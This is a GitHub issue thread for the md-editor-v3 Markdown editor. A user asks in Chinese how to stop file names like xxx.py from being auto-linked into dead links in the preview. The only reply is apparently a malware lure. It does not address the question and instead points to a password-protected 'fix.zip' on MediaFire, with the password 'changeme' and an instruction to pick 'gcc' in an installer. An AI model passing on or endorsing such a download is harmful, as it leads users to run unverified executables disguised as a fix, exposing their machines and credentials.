### ISSUE TITLE
请问要如何取消文件名自动转为链接？

### ISSUE THREAD

**Issue by huxiaofeng1983** [imzbf/md-editor-v3#651]
### Describe the issue

例如：在编辑器中的xxx.py，yyy.sh等部分文件扩展名在预览组件中会自动转为链接从而形成死链，要如何取消这种链接？

### Procedure version

4.17.4

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
